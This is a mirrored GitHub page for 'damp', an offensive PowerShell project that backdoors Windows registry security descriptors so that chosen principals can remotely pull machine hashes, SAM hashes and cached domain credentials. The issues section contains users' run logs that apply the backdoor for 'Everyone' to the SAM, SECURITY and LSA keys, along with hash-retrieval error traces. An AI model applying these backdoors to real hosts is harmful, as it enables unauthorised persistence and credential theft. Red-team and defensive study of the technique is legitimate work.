harmj0y / damp Goto Github PK

The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification

License: BSD 3-Clause "New" or "Revised" License

PowerShell 100.00%

damp's Introduction

DAMP

The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.

This project contains several files that implement host-based security descriptor "backdoors" that facilitate the abuse of various remotely accessible services for arbitrary trustees/security principals.

tl;dr - this grants users/groups (local, domain, or 'well-known' like 'Everyone') of an attacker's choosing the ability to perform specific administrative actions on a modified host without needing membership in the local administrators group.

Note: to implement these backdoors, you need the right to change the security descriptor information for the targeted service, which in stock configurations nearly always means membership in the local administrators group.

More information:

Authors: @tifkin_, @enigma0x3, and @harmj0y.

License: BSD 3-Clause

Remote Registry

Add-RemoteRegBackdoor.ps1

Add-RemoteRegBackdoor

Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine and local account hashes, as well as its domain cached credentials.

RemoteHashRetrieval.ps1

Get-RemoteMachineAccountHash

Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified machine.

Get-RemoteLocalAccountHash

Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified machine.

Get-RemoteCachedCredential

Abuses the ACL backdoor set by Add-RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified machine.

damp's People

Contributors

Stargazers

Watchers

Forkers

rvrsh3ll vysecurity johnjohnsp1 hackmiss av1080p sadprocessor shantanu561993 demonsec666 topotam zshell gdraperi w00t3k its-a-feature seemantbisht jack51706 0xabe-io ykankaya h0k5 dr1ipr 2010phenix adamsh25 keyman9848 tyekrgk icxcoffee wandec raystyle sgnls 1sn0m4d dipsec leoloobeek orf53975 sasqwatch benheise disk-kk evasilence imulmul lazerhawk bcp-infosec-repo 5l1v3r1 marciopocebon shad0w008 reanimat0r bigbrobro mmg1 v4nyl just1fi3d a7t0fwa7 ashr leomatias credteam askyeye ankushgoel27 ilbaroni s3m73x xurse nosorry mostwantedduck jun3p4rk abdulrahman86 lnaphade terrorizer1980 th3k3ymak3r kyle41111 b1gw00d c-fire despratesparten cmndcntrlcyber skyn9ne honeyakshat999 slooppe edermi webvul amr-hamza ethicalsecurity-agency cmjlove1 edd13mora humanaoffsec

damp's Issues

The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.

Hi, I'm trying Add-RemoteRegBackdoor.ps1 on a domain joined windows 10 machine, and I get the following error on all registry keys:

The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.

Any idea on what might be wrong?
I'm attaching the output, but github's markdown makes it difficult to read. Here's the paste just in case:
https://pastebin.com/sbZVfwmn

Thanks!

`PS Microsoft.PowerShell.Core\FileSystem::\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose
VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone'
Get-WMIObject : The RPC server is unavailable. (Exception from HRESULT: 0x800706BA)
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:185 char:36

... iceObject = Get-WMIObject -Class Win32_Service -Filter "name='RemoteR ...
```
            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [Get-WmiObject], COMException
- FullyQualifiedErrorId : GetWMICOMException,Microsoft.PowerShell.Commands.GetWmiObjectCommand

VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start
Add-RemoteRegBackdoor : [DESKTOP-13DT5NH] Error interacting with the remote registry service: You cannot call a method on a null-valued expression.
At line:1 char:1

Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-16QT4E ...

  + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
  + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Add-RemoteRegBackdoor

PS Microsoft.PowerShell.Core\FileSystem::\vmware-host\Shared Folders\share\DAMP> Add-RemoteRegBackdoor -Trustee 'S-1-1-0' -ComputerName DESKTOP-13DT5NH -Verbose
VERBOSE: [DESKTOP-13DT5NH : ] Using trustee username 'Everyone'
VERBOSE: [DESKTOP-13DT5NH] Remote registry is not running, attempting to start
VERBOSE: [DESKTOP-13DT5NH] Attaching to remote registry through StdRegProv
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2
(CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE) VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SECURITY] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SECURITY] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring started for key
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Creating the trustee WMI object with user 'Everyone'
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Applying Trustee to new Ace
The property 'DACL' cannot be found on this object. Verify that the property exists and can be set.
At \vmware-host\Shared Folders\share\DAMP\Add-RemoteRegBackdoor.ps1:246 char:13

        $RegSD.DACL += $RegAce.PSObject.ImmediateBaseObject

```
        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : PropertyNotFound

VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Calling SetSecurityDescriptor on the key with the newly created Ace
VERBOSE: [DESKTOP-13DT5NH : SAM\SAM\Domains\Account] Backdooring completed for key
VERBOSE: [DESKTOP-13DT5NH] Backdooring completed for system

ComputerName BackdoorTrustee

DESKTOP-13DT5NH S-1-1-0
`

Where are all the demos?

Where are all the rest of the powershell scripts from the talk?

https://www.youtube.com/watch?v=SeR4QJbaNRg

Feature Request - Add Removal Option

Please add a 'remove options' to the Add-RemoteRegBackdoor.ps1 script, so that we can do cleanup when we are doing abusing the feature (e.g. at the end of a redteam mission).

Also just curious, for the SID can you use a computer account or would it only work for a user sid? id rather not tie the access to a domain account if i can help it (computer account seems more stealthy and also easier to share).

Error in Get-RemoteMachineAccountHash & Get-RemoteCachedCredential

Hi, RemoteHashRetrieval.ps1 & Add-RemoteRegBackdoor work perfectly, but the other 2 functions
Get-RemoteMachineAccountHash & Get-RemoteCachedCredential encountered some errors as shown below:

PS C:\Users\user1\Desktop\DAMP-master\DAMP-master> Get-RemoteMachineAccountHash -ComputerName mail.testdomain.com
Decrypt-AES : The parameter 'IV' cannot be specified because it conflicts with the parameter alias of the same name
for parameter 'InformationVariable'.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1282 char:30

$LSAKeyStructPlaintext = Decrypt-AES -Key $TmpKey -CipherText $LS ...

```
                         ~~~~~~~~~~~
```
- CategoryInfo : MetadataError: (:) [], MetadataException
- FullyQualifiedErrorId : ParameterNameConflictsWithAlias

Cannot index into a null array.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1283 char:5

$LSAKey = $LSAKeyStructPlaintext[68..99]

```
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : NullArray

Exception calling "ToString" with "1" argument(s): "Value cannot be null.
Parameter name: value"
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1431 char:9

    Write-Verbose ("LSA Key        : " + ([System.BitConverter]:: ...

```
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : ArgumentNullException

Decrypt-AES : The parameter 'IV' cannot be specified because it conflicts with the parameter alias of the same name
for parameter 'InformationVariable'.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1465 char:39

    $MachineHashStructPlaintext = Decrypt-AES -Key $TempKey -Ciph ...

```
                                  ~~~~~~~~~~~
```
- CategoryInfo : MetadataError: (:) [], MetadataException
- FullyQualifiedErrorId : ParameterNameConflictsWithAlias

Cannot index into a null array.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1466 char:9

    $MachineHashBytes = $MachineHashStructPlaintext[16..255]

```
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : NullArray

Multiple ambiguous overloads found for "ComputeHash" and the argument count: "1".
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1471 char:9

    $Out = $MD4.ComputeHash($MachineHashBytes)

```
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodException
- FullyQualifiedErrorId : MethodCountCouldNotFindBest

Exception calling "ToString" with "1" argument(s): "Value cannot be null.
Parameter name: value"
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1472 char:9

    $MachineAccountHash = ([System.BitConverter]::ToString($Out)  ...

```
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : ArgumentNullException

PS C:\Users\user1\Desktop\DAMP-master\DAMP-master> Get-RemoteCachedCredential -ComputerName mail.testdomain.com
Decrypt-AES : The parameter 'IV' cannot be specified because it conflicts with the parameter alias of the same name
for parameter 'InformationVariable'.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1282 char:30

$LSAKeyStructPlaintext = Decrypt-AES -Key $TmpKey -CipherText $LS ...

```
                         ~~~~~~~~~~~
```
- CategoryInfo : MetadataError: (:) [], MetadataException
- FullyQualifiedErrorId : ParameterNameConflictsWithAlias

Cannot index into a null array.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1283 char:5

$LSAKey = $LSAKeyStructPlaintext[68..99]

```
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : InvalidOperation: (:) [], RuntimeException
- FullyQualifiedErrorId : NullArray

Get-RemoteNLKMKey : Cannot validate argument on parameter 'LSAKey'. The argument is null or empty. Provide an argument
that is not null or empty, and then try the command again.
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1687 char:58

    $NLKMKey = Get-RemoteNLKMKey -hKey $nKey -LSAKey $LSAKey

```
                                                     ~~~~~~~
```
- CategoryInfo : InvalidData: (:) [Get-RemoteNLKMKey], ParameterBindingValidationException
- FullyQualifiedErrorId : ParameterArgumentValidationError,Get-RemoteNLKMKey

Exception calling "ToString" with "1" argument(s): "Value cannot be null.
Parameter name: value"
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1690 char:9

    Write-Verbose ("LSA Key        : " + ([System.BitConverter]:: ...

```
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : ArgumentNullException

Exception calling "ToString" with "1" argument(s): "Value cannot be null.
Parameter name: value"
At C:\Users\user1\Desktop\DAMP-master\DAMP-master\RemoteHashRetrieval.ps1:1691 char:9

    Write-Verbose ("NL`$KM Key     : " + ([System.BitConverter]:: ...

```
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
```
- CategoryInfo : NotSpecified: (:) [], MethodInvocationException
- FullyQualifiedErrorId : ArgumentNullException

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.